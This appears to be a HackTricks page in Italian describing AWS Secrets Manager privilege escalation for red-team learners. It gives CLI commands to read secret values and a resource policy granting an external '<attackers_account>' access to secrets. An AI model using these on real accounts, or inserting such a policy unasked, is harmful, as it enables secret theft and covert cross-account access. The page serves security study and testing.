AWS - Secrets Manager Privesc

Reading time: 2 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Secrets Manager

Per ulteriori informazioni su Secrets Manager, controlla:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Un attaccante con questo permesso può ottenere il valore salvato all'interno di un segreto in AWS Secretsmanager.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impatto Potenziale: Accesso a dati altamente sensibili all'interno del servizio AWS secrets manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Con i permessi precedenti è possibile dare accesso ad altri principi/account (anche esterni) per accedere al segreto. Nota che per leggere segreti crittografati con una chiave KMS, l'utente deve anche avere accesso sulla chiave KMS (maggiori informazioni nella pagina KMS Enum).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks